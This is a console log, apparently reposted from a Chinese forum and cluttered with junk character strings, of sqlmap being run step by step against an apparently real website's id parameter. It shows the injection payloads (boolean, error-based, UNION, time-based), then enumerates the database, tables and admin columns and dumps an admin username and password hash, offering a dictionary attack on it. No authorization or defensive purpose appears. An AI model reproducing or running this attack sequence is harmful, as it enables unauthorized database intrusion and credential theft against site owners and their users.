D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( Y! y! X7 U! C4 e4 m. O
ms "Mysql" --current-user /* 注解:获取当前用户名称
) {; S, L3 e0 c6 {, O sqlmap/0.9 - automatic SQL injection and database takeover tool, {! n% b' m0 L. A+ g
http://sqlmap.sourceforge.net starting at: 16:53:54
1 Z1 g0 [$ U2 T: r2 c+ L[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
) G3 W" E9 ^! J0 ^ session file( \% |* M1 b. q9 T- |- p
[16:53:54] [INFO] resuming injection data from session file4 Y) H, ^; }9 }) }2 @
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
" V- {( s% v6 j8 e* [) `# x[16:53:54] [INFO] testing connection to the target url V- G7 x" r) B2 M8 p W3 x
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 n2 G0 V' S3 o9 \! w% _0 j
sts:
+ y$ l4 Z6 w: ?5 I) H3 S---
# `& ]; c% T0 `1 g5 m7 XPlace: GET
; m& l: b4 T* m+ iParameter: id; f _2 z( V1 y! Q) w. ^' c
Type: boolean-based blind* y" ^" e+ o& Q3 A
Title: AND boolean-based blind - WHERE or HAVING clause
3 h+ S I- X1 R Payload: id=276 AND 799=799
* w; W8 g7 X" b, C1 | Type: error-based/ F% Y& T0 X, [ a
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 {# I/ D/ ]" J* E) M" l: a. e Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ c* W: {- }( r" M, V$ R
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ r3 U5 ^6 @0 N$ S
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
. O) w4 W: F/ {. r9 m/ B, L Type: UNION query
+ l" b1 s/ T! t/ U# h! f* i4 w Title: MySQL UNION query (NULL) - 1 to 10 columns
* ^3 ]. ]. J7 J+ M Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% G' S8 F5 \+ n+ o- O7 N9 u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
# E3 {- Z' K5 j6 |8 _, E- dCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; O( z% b$ q s& |
Type: AND/OR time-based blind
/ N3 C- \! W. L9 k7 t( ? Title: MySQL > 5.0.11 AND time-based blind% ~5 |2 l ?4 j, V
Payload: id=276 AND SLEEP(5)
N- d1 m; O; Z9 F& ^$ n" j---
7 Z+ I6 {. l, D2 q% Z% N& R[16:53:55] [INFO] the back-end DBMS is MySQL
% r. p5 ]& O9 C" z, p3 wweb server operating system: Windows( O q8 D: \- S- i/ v; p1 c+ K
web application technology: Apache 2.2.11, PHP 5.3.04 V- E$ s( Q$ ^# w3 u$ o7 B- V
back-end DBMS: MySQL 5.0( A8 E* m+ @7 H
[16:53:55] [INFO] fetching current user/ @ }$ c7 s& l1 @9 z0 H! [
current user: 'root@localhost' % j) u* Z( P2 P: V, @
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
6 q/ {: C' v3 Gtput\www.wepost.com.hk' shutting down at: 16:53:58/ x6 \6 B$ ^6 h
5 e' v o0 f6 i; I5 a
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
! o& j/ C0 x* {6 Fms "Mysql" --current-db /*当前数据库
/ A$ {1 d. ^ m' L9 R sqlmap/0.9 - automatic SQL injection and database takeover tool
! m0 d5 M2 q) w0 p! f http://sqlmap.sourceforge.net starting at: 16:54:16
6 Y! K/ c2 ?" X5 u, ?[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
7 V8 C _6 ~7 d4 j session file
) v" V9 o) x8 P2 g[16:54:16] [INFO] resuming injection data from session file+ J5 H) T I, v' e, U+ P- P
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. r6 B6 _" u2 y& t3 u
[16:54:16] [INFO] testing connection to the target url1 d) o: F; v. h# E# Y
sqlmap identified the following injection points with a total of 0 HTTP(s) reque+ |# W/ k6 j ]7 |' X& Y* x
sts:- r! [/ ]+ n8 q6 t7 v0 U: i9 _% S
---$ {$ Q8 I3 v. J$ Y! ~
Place: GET' l- P) h! T2 ~, R& m. r* Q2 Q
Parameter: id" N& X8 P( @7 g. n: h
Type: boolean-based blind
% W3 x1 y1 U- Z Title: AND boolean-based blind - WHERE or HAVING clause
2 |) F3 Q3 N& f' Z/ @2 P Payload: id=276 AND 799=799- |1 K0 u) |7 w% H$ n& g2 z5 G
Type: error-based
% W: D% b6 C4 [3 X Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
! g3 T& F% _9 L7 f. e Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ }* X* c! j4 i% `
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 _0 h6 S2 Z5 b# p; k/ M! b: g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! r+ J0 m9 N) y' L' e
Type: UNION query. k5 ~ A# @( g9 g4 b% N
Title: MySQL UNION query (NULL) - 1 to 10 columns" z# \. C* i/ D
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# b6 b0 s8 w' @2 j
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: O& Z" x) o7 s8 MCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# O0 C( s& h2 c' G4 I$ X: r
Type: AND/OR time-based blind9 I5 n" s+ x9 a+ t& y- Y5 m5 ?
Title: MySQL > 5.0.11 AND time-based blind J8 l) K _" e3 f ?0 c3 r
Payload: id=276 AND SLEEP(5)
, T8 \! Y. d) p- W2 \) h---
* p/ V1 x- b6 B- Y[16:54:17] [INFO] the back-end DBMS is MySQL
y9 i8 |# z! y" O0 Dweb server operating system: Windows8 o- L" C- U q+ K0 M: J
web application technology: Apache 2.2.11, PHP 5.3.0
5 q) B* l3 ]6 Y) t. R; B' Q3 z! y h* N& Eback-end DBMS: MySQL 5.0
? z! ~3 `- i) k( d" \, P[16:54:17] [INFO] fetching current database k, n- ]3 g1 r0 c- H
current database: 'wepost'
3 ?4 m9 t) f4 @$ L) ^8 v, J( r) m[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
$ g0 m" J) l( n$ G+ Wtput\www.wepost.com.hk' shutting down at: 16:54:18- \$ a5 I2 X. M: L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) g, w# {- R+ Y% y/ E5 F
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
( K* Z6 O7 n$ k9 \ sqlmap/0.9 - automatic SQL injection and database takeover tool" Q- m/ j ]3 H0 ^; m+ w
http://sqlmap.sourceforge.net starting at: 16:55:25
, V( m" J0 w; m# `* x" E0 [[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
/ f* M9 g# N( E/ X& ?+ P session file
3 K% {* K2 Y0 M6 V4 N) v4 ^[16:55:25] [INFO] resuming injection data from session file, L R) ~" Q6 _# l1 }3 k
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file, G! K8 O c( T
[16:55:25] [INFO] testing connection to the target url
' S1 V e3 G% Hsqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ r" O5 I, e9 T4 Dsts:
( H+ ~/ m+ g6 I( n---
6 R- @) J# S* uPlace: GET
$ k0 J8 w5 L/ W9 w- C4 ~Parameter: id$ L; e" G6 @; D7 s
Type: boolean-based blind# u2 h6 t' e( h4 N/ Y6 R% k
Title: AND boolean-based blind - WHERE or HAVING clause! \! Z9 }- }; M
Payload: id=276 AND 799=7996 [- A$ @# r y$ O
Type: error-based4 W' Y$ q! Y* n7 m- ~1 [
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
X& K6 t3 z6 N2 X Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,- u! M( }$ Z+ V) m
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58& |! J2 i' m- x8 u4 X
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 A, F0 ~% S$ o/ B* f
Type: UNION query9 V9 J1 a( j2 m' \# L
Title: MySQL UNION query (NULL) - 1 to 10 columns/ Y3 f( a0 d9 H2 h* `
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR5 ~3 n( s: C' T" P: A2 E+ f3 O
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
% L: [) q9 i( U5 {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 g# ^" ^: [8 @( V% V8 @$ l- p
Type: AND/OR time-based blind4 l5 \4 z7 ]9 j) r8 y9 I0 K3 F
Title: MySQL > 5.0.11 AND time-based blind
}: }- U3 s# K: m, D Payload: id=276 AND SLEEP(5)3 ]! d' J h$ h- o2 D
---
1 ]! j' q& Y/ e0 H[16:55:26] [INFO] the back-end DBMS is MySQL
& F2 i& ]! O' ~8 `4 \ j; E7 O5 wweb server operating system: Windows* L: ]* T: W7 P
web application technology: Apache 2.2.11, PHP 5.3.06 G/ ?" E2 B( R K
back-end DBMS: MySQL 5.06 O, p( _& L7 c+ |9 q$ A# I) m
[16:55:26] [INFO] fetching tables for database 'wepost', a9 C' a! l7 x( Q
[16:55:27] [INFO] the SQL query used returns 6 entries/ h) Z- I- h: J; g2 O% a$ v& h
Database: wepost
; w" H1 D& y; S[6 tables]2 m6 ~: Z- u( M% H, G( K
+-------------+
: X( t) y- Q/ ~; e5 h& g" u9 ]/ f/ e| admin |2 i6 q9 }" A# {4 Z0 W) G
| article |
. ^; Y* f6 w% Z: W3 H| contributor | d- K. U7 {* S2 E2 v
| idea |
5 s* w6 U/ z( r E( J2 b| image |
, C7 b, y( i4 I! J: M' n; C| issue |
" O9 U' @" ]. a: C' K+ p+-------------+4 s5 f, s/ \& x' y
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
- L3 J1 K. c4 w5 [tput\www.wepost.com.hk' shutting down at: 16:55:33" X4 i1 F: R1 r8 P- r5 L
, U1 v+ y5 i& E$ ?# ID:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; S$ q: m6 A7 e' O) a0 H
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名& s4 W `2 k/ [3 V* V4 z# l1 \
sqlmap/0.9 - automatic SQL injection and database takeover tool( u3 b0 h0 _1 t: _# }- y* [
http://sqlmap.sourceforge.net starting at: 16:56:062 v. l, O" e) o- i
sqlmap identified the following injection points with a total of 0 HTTP(s) reque& v; _) i' t5 U
sts:7 k7 A {5 J }' @- p. r) U
---: g. ]; Z% M- k. R5 o" \" u' J: O
Place: GET
. A- M5 w2 q) M7 O1 i: y4 r$ hParameter: id1 l" E; u* {/ S+ G$ N- U
Type: boolean-based blind% P& f5 v% D9 C' o
Title: AND boolean-based blind - WHERE or HAVING clause
& P S! {1 u% b; K& ] Payload: id=276 AND 799=799
/ {4 V3 ?( U- M- R7 V) Z Type: error-based0 I! @/ T9 @2 U2 \$ Q
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 B# H' R2 |8 g0 b- ~" S Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
# D8 }4 @1 I3 ]7 D$ V* ~120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; f7 E0 n# w/ u. A) M+ S* J, l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
4 U" g* r( R6 d Type: UNION query
' l: ~$ H: ^1 ]& }) S j Title: MySQL UNION query (NULL) - 1 to 10 columns
2 P Q ^6 h3 b, i6 P Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 k) ^3 _$ S0 I- C, c2 d
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: m2 T( b, Q6 ^8 ?0 FCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
0 o u4 ]3 `) X( Q1 C5 v5 m Type: AND/OR time-based blind7 w4 T1 {. V$ q, D# `
Title: MySQL > 5.0.11 AND time-based blind1 O6 H r: v6 o4 ]: `" Z) ?
Payload: id=276 AND SLEEP(5)
# C! ]" U4 n1 D---; f1 e/ |* M0 @4 h* U5 x
web server operating system: Windows
7 b, J# e) i8 [& U: z4 `web application technology: Apache 2.2.11, PHP 5.3.01 |7 U' B5 d% i9 I1 O
back-end DBMS: MySQL 5.0
# `; J: K6 T$ |; D9 l4 V[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
( I' G5 B9 |- B$ o+ o7 ession': wepost, wepost
F4 J# ^" c7 J! L4 EDatabase: wepost
8 n. I: W& t8 ETable: admin; l/ s: n @' h" v/ V6 ~
[4 columns]4 c+ `1 t! U4 m# H& V: r0 v) a
+----------+-------------+" w6 ]# W e. h+ E" u" Y d
| Column | Type |9 b0 V1 \$ G {& \3 ?/ v
+----------+-------------+
5 h/ A& v/ E' C7 i: c| id | int(11) |' T3 ]/ I2 p& X* [
| password | varchar(32) |' ?$ \ A; H( ]
| type | varchar(10) |) d- Q# R, g% W8 G* _1 l
| userid | varchar(20) |2 u! V! p" U" }. t8 [$ Q
+----------+-------------+; V- G x: W2 ~ U! ^
shutting down at: 16:56:19 b4 @' {' d* N* x% ^, W
* r- B2 N8 p9 R. M5 Q/ r' S
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
& \9 L* s" P& jms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
& d6 f" J; w6 e2 a1 X+ L sqlmap/0.9 - automatic SQL injection and database takeover tool7 V) ]1 t7 u& g( T0 k2 O D- U% L
http://sqlmap.sourceforge.net starting at: 16:57:14 M; m$ h7 F6 N2 L7 Q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 e+ F D# |4 `4 Z' W3 c3 n
sts:
0 Z9 l. y$ [8 x/ b. ~ @' i---
7 s7 ?$ m7 J! b( N% EPlace: GET
4 I; [! W- M& @' h8 fParameter: id% B4 }7 J/ V; A, E) W Z
Type: boolean-based blind
" X' N' u1 A% T- k" Y' x( e Title: AND boolean-based blind - WHERE or HAVING clause! d" G3 x5 ?0 _( D d. Z3 K1 s C
Payload: id=276 AND 799=7997 L/ V h% z: g! x
Type: error-based
S: a+ k" W* O Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; s+ \, a' s( u6 r
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
% a( K2 g1 s( F: ~120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 ~9 _1 M7 C7 B6 \( [6 `
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ r5 F+ y2 n, l" v/ Y; ?3 H, J: V
Type: UNION query1 Q. ?& i" ~: g' R# R# U% q0 u
Title: MySQL UNION query (NULL) - 1 to 10 columns
( \4 B3 c4 ^5 _6 T1 C) [! m- S Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
$ l+ ?' ]( E+ }% H& S* ? L; d' s& V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ `% z4 p7 U9 U! d( B6 ?
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#( ]( g; x! h( \, ]; S
Type: AND/OR time-based blind
) ]+ z- X7 B: z# p Title: MySQL > 5.0.11 AND time-based blind( y# e5 j0 t% r6 A1 S! l% g( W8 U
Payload: id=276 AND SLEEP(5)
2 J- M, d, a0 G- d. ^+ R# F+ e. Z% l---
: O# @! A7 D- }web server operating system: Windows
$ R, @0 F1 [8 v! n5 Eweb application technology: Apache 2.2.11, PHP 5.3.0
$ k$ }* {5 H" Y! k: G1 ]0 Lback-end DBMS: MySQL 5.0) D! P) x, j% a9 h* t+ T, Q
recognized possible password hash values. do you want to use dictionary attack o8 D& ]( C5 O: n$ @9 g& G3 V* g. T
n retrieved table items? [Y/n/q] y# V) k& N1 ?! {/ [
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]7 Q0 H$ |0 o3 [7 {) K
do you want to use common password suffixes? (slow!) [y/N] y
& B1 M4 l3 z. p( i% wDatabase: wepost/ p \& o, Q! h: w1 H ]- W& T/ {- z
Table: admin3 V( V' z, Y: Y6 {0 P4 o
[1 entry]
3 F0 u; N6 N; e% U( W2 K8 o" q+----------------------------------+------------+! E2 w/ P) w2 ]3 L* w) t5 w( j
| password | userid |, i; x- }% q0 b+ o
+----------------------------------+------------+" l4 s: t: k/ U( x' w( Y2 o
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 | H( S6 h% m. G. E
+----------------------------------+------------+
( y% \7 I- h. K) x9 ^8 U0 ] shutting down at: 16:58:148 r) j" l8 t- Y1 H6 F3 K8 `: A
1 Y( R$ F+ }0 {* P R: r2 v) gD:\Python27\sqlmap> |